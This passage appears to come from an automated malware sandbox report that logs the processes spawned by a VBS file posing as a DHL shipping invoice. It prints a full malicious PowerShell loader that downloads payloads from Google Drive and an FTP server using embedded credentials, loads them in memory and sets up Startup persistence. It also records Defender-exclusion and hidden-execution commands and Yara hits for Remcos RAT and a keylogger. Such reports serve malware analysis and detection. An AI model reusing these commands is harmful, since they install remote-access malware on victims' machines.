                                                                                                Start time:00:17:01
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$rrlqq = ($rrlqq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$rrlqq = ($rrlqq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yzdrg = (New-Object Net.WebClient);$yzdrg.Encoding = [System.Text.Encoding]::UTF8;$yzdrg.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$mkbxz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),(-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )));$lBCzSg = $mkbxz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mkbxz.dispose();$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mkbxz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.ssalc/moc.esac2b//:sptth' , $huUPX , 'D D1D' ) );};"
                                                                                                Imagebase:0x7ff788560000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:4
                                                                                                Start time:00:17:08
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
                                                                                                Imagebase:0x7ff788560000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:5
                                                                                                Start time:00:17:08
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
                                                                                                Imagebase:0x7ff788560000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000005.00000002.1787528120.000002803C402000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:6
                                                                                                Start time:00:17:08
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:cmd.exe /c mkdir "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\"
                                                                                                Imagebase:0x7ff6a1700000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:7
                                                                                                Start time:00:17:09
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\\x11.ps1"
                                                                                                Imagebase:0x7ff788560000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:8
                                                                                                Start time:00:17:09
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\\x22.ps1"
                                                                                                Imagebase:0x7ff788560000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:9
                                                                                                Start time:00:17:11
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                Imagebase:0x7ff693ab0000
                                                                                                File size:496'640 bytes
                                                                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:13
                                                                                                Start time:00:17:20
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1"
                                                                                                Imagebase:0x7ff788560000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000D.00000002.2290132644.000001AB99151000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.2290132644.000001AB99151000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000002.2290132644.000001AB99151000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000D.00000002.2290132644.000001AB99151000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000D.00000002.2290132644.000001AB99541000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.2290132644.000001AB99541000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000002.2290132644.000001AB99541000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000D.00000002.2290132644.000001AB99541000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:14
                                                                                                Start time:00:17:20
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:cmd.exe /c del "C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs"
                                                                                                Imagebase:0x7ff6a1700000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:17
                                                                                                Start time:00:17:23
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                                                                                                Imagebase:0x7ff6a1700000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:18
                                                                                                Start time:00:17:23
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:19
                                                                                                Start time:00:17:23
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                                                                                                Imagebase:0x7ff788560000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000013.00000002.2364592750.000001E3B1150000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000013.00000002.2364592750.000001E3B1150000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000013.00000002.2364592750.000001E3B1150000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000013.00000002.2364592750.000001E3B1150000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                Has exited:true

                                                                                                Target ID:20
                                                                                                Start time:00:17:23
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:21
                                                                                                Start time:00:17:24
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                                                Imagebase:0x970000
                                                                                                File size:43'008 bytes
                                                                                                MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                Target ID:22
                                                                                                Start time:00:17:26
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                                                Imagebase:0x80000
                                                                                                File size:43'008 bytes
                                                                                                MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:23
                                                                                                Start time:00:17:26
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                                                Imagebase:0x940000
                                                                                                File size:43'008 bytes
                                                                                                MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                Has exited:true

                                                                                                Target ID:24
                                                                                                Start time:00:17:31
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                                                                                                Imagebase:0x7ff6a1700000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:25
                                                                                                Start time:00:17:31
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:26
                                                                                                Start time:00:17:31
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                                                                                                Imagebase:0x7ff788560000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001A.00000002.2531838956.000001C222A41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001A.00000002.2531838956.000001C222A41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001A.00000002.2531838956.000001C222A41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001A.00000002.2531838956.000001C222A41000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                Has exited:true

                                                                                                Target ID:27
                                                                                                Start time:00:17:31
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\qpqzbrslzlqmxxqwczcuhtgf"
                                                                                                Imagebase:0x3f0000
                                                                                                File size:43'008 bytes
                                                                                                MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:28
                                                                                                Start time:00:17:31
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:29
                                                                                                Start time:00:17:31
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\qpqzbrslzlqmxxqwczcuhtgf"
                                                                                                Imagebase:0x880000
                                                                                                File size:43'008 bytes
                                                                                                MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:30
                                                                                                Start time:00:17:31
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\ajvsujdnntiralmilkxwkxswwkf"
                                                                                                Imagebase:0xf20000
                                                                                                File size:43'008 bytes
                                                                                                MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:31
                                                                                                Start time:00:17:32
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\lladutngjbaekramcnkpuknfxzxbri"
                                                                                                Imagebase:0xd70000
                                                                                                File size:43'008 bytes
                                                                                                MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:32
                                                                                                Start time:00:17:34
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                                                Imagebase:0xb40000
                                                                                                File size:43'008 bytes
                                                                                                MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:33
                                                                                                Start time:00:17:40
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                                                                                                Imagebase:0x7ff6a1700000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:34
                                                                                                Start time:00:17:40
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:35
                                                                                                Start time:00:17:41
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                                                                                                Imagebase:0x7ff788560000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000023.00000002.2563409063.000001A890401000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000023.00000002.2563409063.000001A890401000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000023.00000002.2563409063.000001A890401000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000023.00000002.2563409063.000001A890401000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                Has exited:true

                                                                                                Target ID:36
                                                                                                Start time:00:17:41
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:37
                                                                                                Start time:00:17:43
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                                                Imagebase:0x550000
                                                                                                File size:43'008 bytes
                                                                                                MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:38
                                                                                                Start time:00:17:49
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                                                                                                Imagebase:0x7ff6a1700000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:39
                                                                                                Start time:00:17:49
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:40
                                                                                                Start time:00:17:49
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                                                                                                Imagebase:0x7ff788560000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
